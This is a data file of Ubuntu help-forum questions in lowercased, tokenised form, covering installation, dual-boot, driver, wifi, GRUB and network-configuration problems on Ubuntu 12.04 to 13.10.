367461	installation of ubuntu-13.10-desktop-amd64	i downloaded the ubuntu-13.10-desktop-amd64.iso and i do n't have a usb and a dvd burner . how can i install it on my windows 8 64bit pc ? is it possible to just run the iso file ? i tried running the wubi inside the ubuntu-13.10-desktop-amd64.iso and it 's not booting to the ubuntu installation screen . i am planning on doing dual boot and i badly need it to test some stuff . your assistance is greatly appreciated . best regards .
367462	crontab commands and backup	i have the following crontab running on my server : 0 23 * * * /etc/webmin/postgresql/backup.pl -- all @ daily /etc/webmin/fsdump/backup.pl 155931323799484 30 20 * * 0 /etc/webmin/fsdump/backup.pl 157271323799728 i know that the 5 values on the left seperated by spaces are the times that the subsequent commands are supposed to run . but what is this `` backup.pl '' and `` -- all '' and those long strings of numbers ? are those supposed to be commands ?
367463	is it possible to update the app indicator from code ?	i use ruby-libappindicator bindings to manage ubuntu application indicators . i want to indicate if port 3000 is used by any application . port checking is n't a problem but i also need to update the indicator ( i want to show the green or red circle ) when port becomes busy/free . i can create a new indicator like this : require `` ruby-libappindicator '' indicator = appindicator : :appindicator.new ( `` test '' , `` indicator-messages '' , appindicator : :category : :application_status ) indicator.set_menu ( gtk : :menu.new ) indicator.set_status ( appindicator : :status : :active ) gtk.main but after gtk.main call the code `` hangs '' so i ca n't call any other method . how i can update the appindicator icon after its creation ?
367464	windows that are snapped to one side freeze the computer when i drag them to make them full screen	when i have a window snapped to one side , and i drag it to the top of the screen to make it go full screen , it displays the area that it will be , stops at about 4/5s of the way there , and freezes the computer , forcing me to reboot to start using anything . sometimes it does n't do this , but most of the time it does . what is going on ?
367466	kde application menu items missing	i 'm running kubuntu 13.10 and kde on top of openbox . a few days after upgrading to 13.10 and after a regular software update , all the applications normally listed in `` applications '' in the kde launcher ( `` start '' button ) are no longer listed . additionally all file associations are gone ( like what application should be use when opening pdfs ) and the dialog box for file associations ( when run from dolphin ) do not show any options . this has been going on for days . at one point it started working but i have no idea why . i tried running kbuildsyscocoa4 -- nonincremental and it seemed to run but it did not fix the situation . i removed my .kde directory ( moved it ) but that did n't help . all the other users on my system have the same problem . any new user i create has the same problem . gnome and cinnamon are unable to fully load . unity does but i do n't want to use it ( plus it has some issues ) . lxde appears to be working fine and its applications menu is fine . i have more issues that have cropped up since the upgrade but this is the worst .
367468	not able to connect to wifi dual boot system	i am using dual booting system . wifi in my windows 8 operating system is working perfectly but in ubuntu suddenly it stopped working what problem can be there ? please suggest me
367473	quick app install	is there a way to install apps in ubuntu 12.04 ? what i am looking for is something like an *.msi file for windows . if there is n't , then is there a way to enable all software resources so that you could just install an app by clicking on the install button in the sc ? i am not concerned about viruses , as i can just wipe the partition and re install ubuntu , no personal files are stored on the computer .
367478	system upgrade 13.04 to 13.10 filesystem check or mount failed	i got started the system upgrade . unfortunately , my upgrade just froze in the middle of the installation and i , was prompted to force my pc down by pressing the reset button . now my ubuntu wo n't to start . i found this : run from maintenance shell one line at a time : mount -o remount , rw / dpkg -- configure -a mount -o remount , ro / sync reboot but i do n't know where to enter it .
367483	error when i open the terminal : `bash : /opt/ros/hydro/setup.bash : no such file or directory`	i 've uninstalled ros with : sudo apt-get purge ros-* then when i open terminal i get this message . i have no idea how to solve it . p.s . because of the error i ca n't install ros again .
367488	are the broadcom drivers in any new releases for my dell with bcm4401 and bcm4311	i installed 12.04 on my wife 's dell laptop to replace 10.04 . the code for the broadcom drivers is broken and i am a user , not a coder . does any available release of ubuntu have the drivers in place so i can install and run and get my life back after days of thrashing around . i am willing to do some work , but i am not up to heavy duty command line activity . please help if you can with any information . thanks in advance . matt
367489	unable to get wireless on a dell inspiron e1405	laptop was purchased in early 2007 , with a dell 1390 wireless mincard that references bcm94311 . have just installed ubuntu 12.04 lts in place of xp . the broadcomm sta wireless driver ( bcm43xx ) installed correctly and says it is `` activated and currently in use . running on eth cable now but for a few moments yesterday got what appeared to be a wireless connection ( the typical wireless icon at top right in place of the two opposing arrows ) but it fluttered on and off and finally reverted to the cable . have n't seen it . oddly enough i can print to my wireless printer ( no direct cable connections unless through modem/router but that printer is not attached to my imac . i get no indication of any wireless connection under the network setting - actually everything but wireless . have seen other topics on this problem but nothing quite so specific to what i 've just described . what seems to be the best solution to this problem because otherwise i 'm really liking ubunto over xp , by a wide wide margin !
367496	xterm giving error that display is not set	$ xterm xterm : xt error : ca n't open display : xterm : display is not set i connect to the server using ssh -x user @ server . display is not set $ echo $ display $ $ cat /etc/ssh/sshd_config | grep x x11forwarding yes x11displayoffset 10 i am running ubuntu 13.04
367499	black screen problem after removing bumblebee	i use nvidia optimus gt540m graphics card . today i upgraded to 13.10 successfully and installed bumblebee but because of the problems about using external screen , i removed it using sudo apt-get install ppa-purge sudo ppa-purge ppa : bumblebee/stable commands . after reboot , there was only black screen and a cursor after login even though login screen was still available . so , i installed nvidia-current but that did n't solve problem . after that , i reinstalled compiz , i activated unity-plugin from compiz-config settings manager . now , after restarting several times , unity may work . even if it works , in spite of that multiple workspaces are allowed and shortcuts are set , i can not switch workspaces using these shortcuts ( e.g . ctrl+ alt + left ) . i want to set unity back to it 's initial settings , the ones i used when i installed ubuntu . i do n't know if i installed drivers properly too and unity does n't seem to be working correctly . thanks in advance . edit : i managed to reset unity and shortcuts seem to be working now . but still , when i login , i usually end up with a black screen and a cursor . i open unity from ctrl+alt+f1 , some parts remain missing like panel at the top . its possible that i have a problem with drivers
367502	net_cls and ns subsystems not available in 12.04 ?	i 'm playing around with cgroups and i noticed when i try to list all available subsystems that the network ones are not available ? running the following command should list all available subsystems - including the ones which are not attached to any hierarchy . am i missing something ? vagrant @ precise64 : ~ $ lssubsys -a devices freezer blkio perf_event cpuset , cpu , cpuacct , memory i 'm running the following kernel : vagrant @ precise64 : ~ $ uname -a linux precise64 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux and using the latest lxc build - although i know that should n't have any effect on this : vagrant @ precise64 : ~ $ dpkg -l|grep lxc ii liblxc0 1.0.0~alpha2+master~20131025-2342-0ubuntu1~ppa1~precise1 linux containers userspace tools ( library ) ii lxc 1.0.0~alpha2+master~20131025-2342-0ubuntu1~ppa1~precise1 linux containers userspace tools ii lxc-templates 1.0.0~alpha2+master~20131025-2342-0ubuntu1~ppa1~precise1 linux containers userspace tools ( templates ) ii python3-lxc 1.0.0~alpha2+master~20131025-2342-0ubuntu1~ppa1~precise1 linux containers userspace tools ( python 3.x bindings ) vagrant @ precise64 : ~ $ and the following cgroup-bin package ; vagrant @ precise64 : ~ $ dpkg -l|grep cgroup-bin if cgroup-bin 0.37.1-1ubuntu10.1 tools to control and monitor control groups vagrant @ precise64 : ~ $
367503	how do i stop xubuntu 13.10 from suspending when i close lid ?	i just upgraded to 13.10 and tried configuring at the settings manager , but it does n't seem to work . so i tried configuring xfce4-power-manager/lid-action-on-ac and it did n't work eiter . then , at last , tried editing /etc/systemd/logind.conf to : # handlepowerkey=ignore # handlesuspendkey=ignore # handlehibernatekey=ignore # handlelidswitch=ignore and # lidswitchignoreinhibited is marked `` yes '' by default , but i 've tried switching it to `` no '' , with no response . so , the computer is still suspending when the lid is closed ... what else should i try ? or is it xubuntu 13.10 installation that is bugged ?
367507	formatted hdd but grub remains , ca n't boot from cd or install windows	i bought a laptop with ubuntu formatted the hdd through my pc put the hdd back wiped out formatted still grub remains ca n't let me boot from windows cd or usb ! ! what can i do . ?
367510	tor installation	i am not able to install tor browser . i am trying through ppa .. but its throughing error that `` can not access ppa check your internet connection '' though all connection are working fine .
367513	fdisk yielding different results between kernel versions	i wrote a small script to calculate partition sizes based on some set rules ( 1 gb for /boot , 8 gb for swap , 30 gb for / , 30 gb for /var , and the remaining space split 40 % /60 % between /home and a /backup partition . this script runs flawlessly on 3.2 ( ubuntu 12 ) , and fdisk yields no complaints about the drives . upon taking these drives to a 2.6 kernel-based system ( ubuntu 8.04 ) , /proc/partitions will show either no partitions at all , or if it does , fdisk will report the cylinder boundaries are incorrect on some of the partitions . is there a known discrepancy between 2.6 and 3.2 regarding drive geometry ?
367514	how do i hide the icons on the top panel ?	hey guys , i just installed ubuntu 13.10 on my asus u46e-bal6 laptop . there are a few icons in the tray up top that i dont use , and i was wondering how i could remove them . for example , i never need to use the mail icon or keyboard icon . any ideas ?
367516	disable intel gpu in ubuntu 12.04	i am wondering if there is anything to disable the intel gpu on ubuntu 12.04 . i want to be able to setup dual monitor using nvidia-settings . it seems the intel gpu is used for display as suggested by sudo lshw -c display the output is *-display description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : c0000000-c0ffffff memory:90000000-9fffffff memory : a0000000-a1ffffff ioport:4000 ( size=128 ) memory : a2000000-a207ffff *-display description : vga compatible controller product : haswell integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:47 memory : c2000000-c23fffff memory : b0000000-bfffffff ioport:5000 ( size=64 ) i have a lenovoy410 with gt750m . it seems there is no way to turn off the intel gpu in bios either . help please . thanks .
367520	change menu bar size unity 7.1.2 - ubuntu 13.10	i 'd like to slightly edit the size of the bar that has the wifi , date and time on it . the unity panel , or menu bar . this post : increase menu bar size demonstrates how to do exactly what i 'm talking about with 12.04 and a different unity version . does anyone know how to do it on 13.10 with unity 7.1.2 ? i tried looking for similar file paths but could n't find exactly what file to edit .
367521	how to install 13.04 on a partitioned hardrive	first , not a computer literate person , not even a novice- so please use small words . i recently made the switch to ubuntu , it came preloaded on my new laptop that i order from a big tech dot com site . the version on it is 12.04 ( i think ) and 64bit . this system has a lot that i like but it is quirky for me to say the least . apparently i have held broken packages and have no way of knowing how to find them . i discovered this when trying to download ( from software center ) vlc so that i could watch some movies i had on an external hard-drive . unmet dependencies error and held broken package errors abound while trying to fix the problem . ive scoured this site and other and followed almost all the suggestions to a t but still i am unable to fix anything . my computer is partitioned ( but i do n't even know how to get to the otherside so to speak ) . i would like to know ; can i put the newer 13.04 os on one side of the partition and then delete the older version on the other side ? or , can i install 13.04 over the existing 12.04 ? what would i need to do this ? an obstacle that i have is this , i am currently serving in afghanistan so going someplace to buy something or running down to a computer store for service support is out of the question . i very much appreciate your help , cause right now this computer is nothing more than a word processor , which would be fine if all i wanted was a word processor . thanks in advance .
367526	encrypted usb stick not booting anymore how can i resolve the disaster	guys i am experiencing massive problem here . i created a bootable usb stick that i `` full disk '' encrypted with ubuntu 13.04 . i was using it when it froze . i had to reboot it manually and now i can not boot on it anymore ( it is not listed in the boot menu anymore ) if i put when i run ubuntu on my laptop ubuntu can see it and i am asked for a password but the correct password does not seem to work ( i assume that this passphrase is the one i was using previously at startup ) can you please help me figure this thing out , this is massive problem to me ...
367528	minecraft wont take keyboard input	after upgrading to 13.10 ftb ( minecraft ) wont take keyboard input after login in . i can click the buttons but it will not let me type in a address on multiplayer , or copy/paste with mouse . since upgrading i can not run the other mod packs either , only the one i had installed from 13.04 . i get this when running a new modpack : 2013-10-28 15:14:52 [ info ] [ stderr ] exception in thread `` minecraft main thread '' java.lang.exceptionininitializererror 2013-10-28 15:14:52 [ info ] [ stderr ] at net.minecraft.client.minecraft.func_71384_a ( minecraft.java:355 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at net.minecraft.client.minecraftappletimpl.func_71384_a ( sourcefile:56 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at net.minecraft.client.minecraft.run ( minecraft.java:733 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at java.lang.thread.run ( thread.java:724 ) 2013-10-28 15:14:52 [ info ] [ stderr ] caused by : java.lang.arrayindexoutofboundsexception : 0 2013-10-28 15:14:52 [ info ] [ stderr ] at org.lwjgl.opengl.xrandr $ screen. < init > ( xrandr.java:234 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at org.lwjgl.opengl.xrandr $ screen. < init > ( xrandr.java:196 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at org.lwjgl.opengl.xrandr.populate ( xrandr.java:87 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at org.lwjgl.opengl.xrandr.access $ 100 ( xrandr.java:52 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at org.lwjgl.opengl.xrandr $ 1.run ( xrandr.java:110 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at java.security.accesscontroller.doprivileged ( native method ) 2013-10-28 15:14:52 [ info ] [ stderr ] at org.lwjgl.opengl.xrandr.getconfiguration ( xrandr.java:108 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at org.lwjgl.opengl.linuxdisplay.init ( linuxdisplay.java:618 ) 2013-10-28 15:14:52 [ info ] [ stderr ] at org.lwjgl.opengl.display. < clinit > ( display.java:135 ) 2013-10-28 15:14:52 [ info ] [ stderr ] ... 4 more
367530	ca n't copy from hfs+ external	i 've spent days and days trying to figure this out , but still ca n't . i think i 've read every article on this and tried all there is to try , and i still ca n't copy any file from my mac-formatted hfs+ external drive . sorry if there 's still an article i 've missed.. i have disabled journaling and tried all the hfsprogs commands i could find , but still whenever i click on a folder on the external and try to copy it to my home directory , i get this : `` the folder xxx can not be handled because you do n't have permission to read its content . '' i then found an article about inoring this by copying files through the terminal . when trying to run the sudo cp -r command in the terminal with my external drive path , i always get 'no such file or directory'.. does anyone have another suggestion for me ? thanks in advance !
367532	where do i get ncurses man pages from ?	i ca n't find the ncurses man pages even after : sudo apt-get install libncurses5-dev
367534	media drive permissions	i just switched from a hackintosh to linux , and am trying to make sense of it . on my hackintosh , i partitioned a big drive into 3 parts -- 1 which holds music , 1 for film/tv , and one for the os . i installed ubuntu onto the os partition , and am now trying to make it so i can write to the media drives . i 've searched around and tried several things . i tried gksu nautilus in terminal , which brought me into root permissions . when i select a folder and try to change permissions , i get `` the owner could not be changed ... error setting owner : read-only file system '' ultimately , i have two specific aims : - i want to make it so i can write to the film/tv drive from the ubuntu machine only - i want to make it so i can write to the music drive from the ubuntu machine , or any other machine on the network ( all macs ) . that is , i want a single music library ( an itunes file ) that will serve all mac laptops/ipads/iphones on the network , but which xbmc on the ubuntu machine can also see / read from . music will be added to the itunes library via a single mac laptop , but all other devices should be able to see the music drive .
367536	ubuntu desktop environments , no internet access	windows has been a pain , so i installed ubuntu 13.10 on my parent 's hp pavilion first with cinnamon . for the first few days , it worked wonderfully , and then stopped connecting to the internet . i tried using the windows partition and it worked fine . posted a question about this - no answer yet . since then , something happened while my parents were using it . the windows partition was completely erased . i reinstalled ubuntu and the cinnamon desktop . worked great for a day , then same connectivity issue . since ubuntu works fine on my netbook without cinnamon , i thought perhaps this was a cinnamon issue . removed cinnamon and installed lxde . lxde , much like cinnamon , worked well . then i rebooted and could n't connect to the internet . i encountered the same issue when using kde . the computer uses wifi . in all three desktop environments , it connected , no problems , then after reboot said no available networks - if anything at all . i just removed kde , and ubuntu connects to the wifi , even after several reboots . all three said wired connections were enabled . i tried toggling that on/off - that did nothing i would personally like something with a bottom panel as my parents are familiar and comfortable with windows and can barely use their cell - phones so i do not think unity will work too well for them . ubuntu with unity seems to be the only way to access the internet . my parents mostly use the internet to check email/facebook/watch video . anyone know how to fix this ? update : i left as ubuntu figuring they could at least use it that way . today , the it could not locate the wireless network , which appears to be working fine as i can connect my phone and netbook to it . i tried installing 12.04 , thinking the lts version would work - no go , the network does n't show up . i tried reinstalling 13.10 , so far i tried using the startup disk creator and the unetbootin - both created errors ... . any and all help appreciated !
367537	partition table nonresponsive during instal	i started a ubuntu install , but the impetuous teenager ( it ) at the controls `` did stuff '' that resulted in an install failure . we had arrived at the partition table . now , there are no clickable actions in the partition part of the installation . `` install now '' returns the message , `` no root file defined . '' how can i use ubuntu from cd to make a root file or bootable partition ? i 've been struggling with the previous screwups by it for 3-4 days , so i am becoming desperate .
367538	display clock frequency per core using conky	i am using conky to display a lot of information of my system . i managed to display the load percentage per core . but i do not know how to display the clock frequency of each core . what i have now is : $ { font sans-serif : bold : size=8 } processors $ { hr 2 } $ { font } cpu1 : $ { cpu cpu1 } % $ alignr $ { freq } mhz $ alignr $ { cpubar cpu1 8,60 } cpu2 : $ { cpu cpu2 } % $ alignr $ { freq } mhz $ alignr $ { cpubar cpu2 8,60 } cpu3 : $ { cpu cpu3 } % $ alignr $ { freq } mhz $ alignr $ { cpubar cpu3 8,60 } cpu4 : $ { cpu cpu4 } % $ alignr $ { freq } mhz $ alignr $ { cpubar cpu4 8,60 } cpu5 : $ { cpu cpu5 } % $ alignr $ { freq } mhz $ alignr $ { cpubar cpu5 8,60 } cpu6 : $ { cpu cpu6 } % $ alignr $ { freq } mhz $ alignr $ { cpubar cpu6 8,60 } cpu7 : $ { cpu cpu7 } % $ alignr $ { freq } mhz $ alignr $ { cpubar cpu7 8,60 } cpu8 : $ { cpu cpu8 } % $ alignr $ { freq } mhz $ alignr $ { cpubar cpu8 8,60 } but this only gives me the global clock frequency and not the individual clock frequency per core . does someone know how to get the individual clock frequency per core ? system information linux mint 13 kde , 64 bit ( based on ubuntu 12.04 ) intel i7-2670qm ( quad core with multithreading )
367539	ubuntu 13.04/13.10 - low graphics mode/black screen after login	since last week , my ubuntu 13.04 installation started booting up in low graphics mode out of nowhere . i tried a number of solutions found on this site but to no avail . the other night , i decided to upgrade to 13.10 to see if the issue would be fixed in the process . since then , the system starts fine , but when i login to my account , i 'm just presented with a black screen . i switched to the terminal and did any necessary updates , but to no avail . i do n't even know where to start debugging this issue , so i 'd appreciate if someone could point me towards the first place to start looking ?
367541	files lost after reinstalling ubuntu 13.10	i had problmes with 13.10 , and i reinstalled it with option `` all documents , data , sofware will be saved '' . but after reinstalling i saw that some apps are lost ( chromium , chrome , dropbox , apache , mysql etc . ) and with apache all my files are lost . there 's no /var/www/ folder anymore . all my works were in that folder . is it possible to recover them ?
367542	ubuntu install 13.10 - media change	i 'm in the middle of an install of 13.10 on a poweredge with raid 5 setup . it is asking for a `` media change '' and `` release amd64 salamander ( 20131016 ) '' . i have the cd in the cd drive , but it wo n't go forward with the install even though i have the correct disc . thinking that maybe the disc as damaged i downloaded the iso again and burned it , with no errors . why is the install asking for this ?
367543	ubuntu 13.10 on ssd ( system ) and hdd ( data ) . missing /grub/i386-pc/normal.mod	i 've got a hdd ( 750 gb ) and a ssd ( 16 gb ) . i want to install ubuntu ( 13.10 ) on the ssd , but because of its small size , i need to install /home , /var and /tmp on the hdd . after that , i would like to install windows ( system + data ) on another partition of that hdd , but it is not important now . i installed ubuntu ( i had formatted and partitioned the disk before ) , but when i restarted my laptop it said : 'error : file '/grub/i386-pc/normal.mod ' not found . grub rescue > ' i tried to reinstall grub 2 using this tutorial ( as sdxy i used sdb1 , because it 's the only one partition of my ssd ) , but it did n't work . can anybody help me , please ?
367544	ubuntu bootable usb stick on chrome book	ok so my question is how do i install a bootable usb using my chrome book but not installing ubuntu on it . i cant seem to find any youtube video . if you could point me in the right direction that would be great -thanks
367551	mouse and keyboard loss on laptop	i am having a weird bug on my asus laptop with xubuntu 13.0.4 . sometimes when i start it everything works fine except for the keyboard and mouse that do n't respond . i have to remove the battery to shut the pc down . the pc commands like fn + brightness still work though . does anybody know about this issue ?
367553	ca n't set static ip on ubuntu	i recently installed ubuntu desktop 13.10 and i am trying to set up static ip by changing the /etc/network/interfaces file from : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback iface eth0 inet dynamic to : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback iface eth0 inet static address 192.168.1.70 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 gateway 192.168.1.1 dns-nameservers 8.8.8.8 using whatever i gleaned from these faq/tutorial sites ubuntu network configuration problem with static ip in ubuntu 12.04 lts server linux basics - set a static ip on ubuntu howto : ubuntu linux convert dhcp network configuration to static ip configuration i have double checked those numbers , and they are the same values i use on 2 different computers at the office ( note : those 2 computers , raspis , are connected to a network switch then the router , whereas the desktop currently in question connect directly to the router ) . however , when i enable static addresses and restart , the machine does not get the ip address i requested ( 192.168.1.70 ) , instead getting a different one ( 192.168.1.111 ) disabling the nic altogether . i have also tried requesting a different ip address ( 192.168.1.199 ) in case the old one was taken , but that too results in the nic being disabled . i am asking this question here as google/so does not seem to have an answer specifically pertaining to what users should do , and how they should proceed when simply `` googling the problem '' and quickly updating a single file does not result in static addresses . i am specifically requesting the following : an answer as to why this may not be working ( ie . whether this is ubuntu 13.10 related ) . how to debug the network initialization during boot . how to finally set up static ip addressing . edit : as per atari 's requests , i tried setting the ip using the gui instead of the command line . to do this , i had to purge the /etc/network/interfaces file first ( by commenting out the static related lines ) , restarting , then trying again . if i do not do this , i can not even access the options of my nic . this did assign a static ip to my computer , however , now i only have local access to and from it ( via ssh ) with absolutely no access to the internet .
367558	installing ubuntu 13.10 not opening !	i got ubuntu on my flash drive and booted it from there . i tried to install it but it said something went wrong . i restarted my computer and booted from flash drive again . this time it took me straight to the ubuntu demo and now it wont let me run the `` install ubuntu 13.10 '' app ! help !
367559	will i reduce the life of my ssd prematurely ?	i purchased my first ssd drive and since i have been learning linux figured i would ask about installing ubuntu 12.04 lts on a ssd . i know from doing research there was issues with write life on a ssd . with the samsung evo 840 series 250gig is there any reason to worry about the write life ? i would also like to install vms as i study security , so i would install kali linux and some windows os . i would just like some advice if possible for i do not want to kill my ssd in like a year
367560	how to connect ubuntu touch to hollandsnieuwe mobile broadband	i have installed ubuntu touch on my galaxy nexus , but i 'm having trouble setting up a mobile broadband connection . my provider is hollandsnieuwe , which is a virtual provider on the dutch vodafone network . my provider hollandsnieuwe is not listed in /usr/share/mobile-broadband-provider-info/serviceproviders.xml , so i added the following entry : < ! -- nehterlands -- > < country code= '' nl '' > < provider > < name > hollandsnieuwe int. < /name > < gsm > < network-id mcc= '' 204 '' mnc= '' 04 '' / > < apn value= '' data.dataxs.mobi '' > < plan type= '' postpaid '' > < usage type=誰nternet '' > < /apn > < /gsm > < /provider > < /country > at the hollandsnieuwe page i found the following settings , which were working when i ran android . name : hollandsnieuwe int . apn : data.dataxs.mobi proxy : empty port : empty username : empty password : empty mcc : 204 mnc : 04 verification type : pap apn type : internet both cellular data and data roaming are enabled . sometimes the 3g icon lights up for a couple of seconds and it goes away again . nmcli c tells me that the available gsm connection has never been used . but i ca n't start it with nmcli con up id connectionname instead it returns : warning ** : async_got_type : could not read properties for /org/freedesktop/networkmanager/activeconnection/38 : method `` get '' with signature `` ss '' on interface `` org.freedesktop.dbus.properties '' doesn't exist i tried a prepaid sim card from another provider , which gave me 3g access instantly.any help is appreciated .
367562	why is text on my tv monitor all grainy ?	i have successfully installed the catalyst drivers and hooked up my 1080p tv to the radeon hd 5750 's hdmi port and now it is working . there only seems to be one issue - most images appear ok , at least to my eyes , but text is grainy and difficult to read ( not sure how well it can be seen in the picture ) : it works fine with a smaller screen , and hopefully you can see it with the new pictures which are only slightly better , but images are rendered a little funny too . changing antialiasing does nothing and changing the refresh rate only makes a slight change if any . the small monitor i have works fine . smaller resolutions such as 1024x768 look ok but are the wrong aspect ratio . i have tried renaming the input mode on the tv to `` pc '' , and that helped ... a little bit . also , i tried a different pc with the same result . messing around extensively with the ati catalyst control center also did not help . i am wondering if there is anything else i can try to increase the quality so it is more usable .
367566	unable to disable automatic login on 13.10	i have my settings as such , but when i power-on my laptop , it logs me right in , with no prompt . does anyone else have this problem ?
367567	is ubuntu able to run well on the 15 '' retina macbook pro yet ?	i need to use gnu octave . it has stopped working since i upgraded to osx 10.9 . i am prepared to reinstall ubuntu if it is working properly now . last time i tried to install it , i was unable to change my screen brightness . it also would not come back to life after sleeping .
367568	can not get ubuntu to recognize windows 7	i have installed windows 7 on my laptop and then wanted to go and install ubuntu 12.04 afterwards . when i installed windows 7 i created a couple of spare partitions . i then used the ubuntu usb boot method ( and later on i downloaded the normal 12.04 desktop 64 bit ubuntu ) . whenever i insert the ubuntu cd in and then select to install ubuntu it never recognised the 64 bit windows 7 installation . i have managed to do this in the past ( and i swear i had windows 7 first and then ubuntu second ) . could someone please advise/help ? i have now used three different windows 7 installation disks and 2 ubuntu ( usb stick 12.04 twice ) .
367571	corupted kernel as a result of nvidia driver 319	i 'm new here , first time posting , only reading here for a couple days . i recently installed ubuntu on my box so i could do work on something similar to a senior thesis from home . upon first start up i realized that my ubuntu did n't like my video card , a nvidia gtx 660 . i changed my monitors so one would run though the motherboard , and saw that ubuntu was prompting me to install the very drivers i needed . big mistake . after installing them , i rebooted my system . all that would appear was a black screen with a single white cursor in the upper lefthand corner , similar to a terminal window . it was however not a terminal window , and would not respond to keyboard or mouse input . after several bouts of frustrated key mashing , i accidentally hit ctrl+s , activating the accessibility option for blind people . ubuntu started reading to me my key presses and the password entry points on the login splash page , saying in a computery voice `` asteric , asteric , asteric , asteric , asteric '' as i attempted to type in my password . after this marginal success , ubuntu would no longer speak to me , and i was lost in which keys i 'd pressed . after languishing at this stage , i attempted to reboot into repair mode . the text on the screen went whizzing past , finally stopping on `` kernel corrupted '' . further above it read something about attempting to load nvidia drivers , and corrupting at that stage . i have tried re-installing ubuntu several times now ( my count is to 5 ) and it has not resolved the problem . i 've used several tools to restore the mbr to pre-grub status , and deleted and reformatted the partition that ubuntu was installed on . i 've installed it on different drives , hoping to dodge the drivers , or corruption , but i do n't know enough about where the kernel lives to attempt to remove it . where should i go from here ? my windows side is unaffected by any of this , thankfully , but i still desperately need my machine to run ubuntu for the aforementioned thesis project . has anyone fixed a problem like this before ? tldr ; installed nvidia 319 driver , corrupted kernel , ca n't clean the system enough to re-install without a corrupted kernel . edit : i would like to make clear , i did n't reformat the whole drive , only the portion where i installed ubuntu . also , ubuntu is new for me ; any step by step instructions for the help you offer would be useful . edit2 : ubuntu 12.04
367573	google earth installation in ubuntu 13.10 fail	i followed the instructions found in this site with no success . here is the terminal window : pierpaolo1942 @ ubuntuhome : ~ $ wget http : //dl.google.com/dl/earth/client/current/google-earth-stable_current_i386.deb -- 2013-10-28 15:36:10 -- http : //dl.google.com/dl/earth/client/current/google-earth-stable_current_i386.deb resolving dl.google.com ( dl.google.com ) ... 2607 : f8b0:4003 : c02 : :88 , 74.125.227.226 , 74.125.227.238 , ... connecting to dl.google.com ( dl.google.com ) |2607 : f8b0:4003 : c02 : :88|:80 ... connected . http request sent , awaiting response ... 200 ok length : 45541972 ( 43m ) [ application/x-debian-package ] saving to : ‘google-earth-stable_current_i386.deb’ 100 % [ ============================================================================================= > ] 45,541,972 657kb/s in 77s 2013-10-28 15:37:27 ( 575 kb/s ) - ‘google-earth-stable_current_i386.deb’ saved [ 45541972/45541972 ] pierpaolo1942 @ ubuntuhome : ~ $ sudo dpkg -i google-earth-stable*.deb [ sudo ] password for pierpaolo1942 : selecting previously unselected package google-earth-stable . ( reading database ... 338485 files and directories currently installed . ) unpacking google-earth-stable ( from google-earth-stable_current_i386.deb ) ... setting up google-earth-stable ( 7.1.1.1888-r0 ) ... processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for mime-support ... pierpaolo1942 @ ubuntuhome : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : printer-driver-hpijs use 'apt-get autoremove ' to remove it . 0 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . pierpaolo1942 @ ubuntuhome : ~ $ thank for your time .
367574	how can i get all the url of the dependencies of a deb package ?	i want to check if it is possible to list the url 's that are needed for all the dependencies for a specified systems . lets suppose i want to install a software and it depends on 100 + individual packages and i need to get a couple of tens of such packages . it happens that i am inside a restrictive proxy ( hell ! ! ! of course ) that asks me to specify each url that i need access to . i figured out that i can use apt-rdepends to get a list of the dependent packages . but how do i get the dependencies correct to urls ( assuming *.ubuntu.com is okay )
367580	issues with ganglia and upstart in 13.04	i 'm having an issue with ganglia-monitor and upstart . just after installing it starts and it can not be stopped . i tried to solve it following http : //upstart.ubuntu.com/cookbook/ # expect but i can achieve upstart to track the actual pid of gmond . assuming the configuration of the init config is wrong i followed direcetions in http : //upstart.ubuntu.com/cookbook/ # how-to-establish-fork-count in order to try to fix it . as it states a count of 1 means `` exec fork '' stanza and 2 means `` exec daemon '' ... . gmond gives a count of 8 ... and of course i can get it to track the actual pid . i have n't found a bug report or something like that . is there something i missed ? upstart seems to be failing and the worst thing is that upstart hangs on start/stop and i can not even uninstall or reconfigure packages .
367582	grub-efi-amd64-signed failed on luks encrypted disk	am i doing something wrong installing using luks in dual boot ? i 've got a dual boot system with win 8 installed , i 'm re-installing ubuntu 13.10 along side to enable full disk encryption , following this guide almost to the letter : how can i install ubuntu encrypted with luks with dual-boot ? the only difference is that i do n't create a new boot partition ( there is already an efi boot partition ) , and i use two partitions for home and / ( probably pointless as they 're both in the same luks container ) creating the luks container and partitions seems to go fine ( no errors reported certainly ) . so i finish the graphical installer , but it fails with : the 'gub-efi-amd64-signed ' package failed to install into /target/ . without the grub boot loader , the installed system will not boot . i 've tried this twice now , and got the same thing both times . extra details the machine is a dell xps 15 ( l521x ) i 'm using an ubuntu 13.10 live dvd . i previously used the same dvd to install next to the same windows install , just without the luks stuff , and it worked with no problems . efi - fast boot and secure boot are disabled . i 'm also a relative linux newb , and have never dealt with efi or disk encryption before . this question has a similar problem , but on 12.04 , and without luks .
367583	make notifications bubble shorter	these kind of notifications appear when i change volume , dropbox gets new files , etc . they stay there for about 10 seconds , this is what too long it should be around 2 seconds . how can i change this so that the desktop notifications go away faster ?
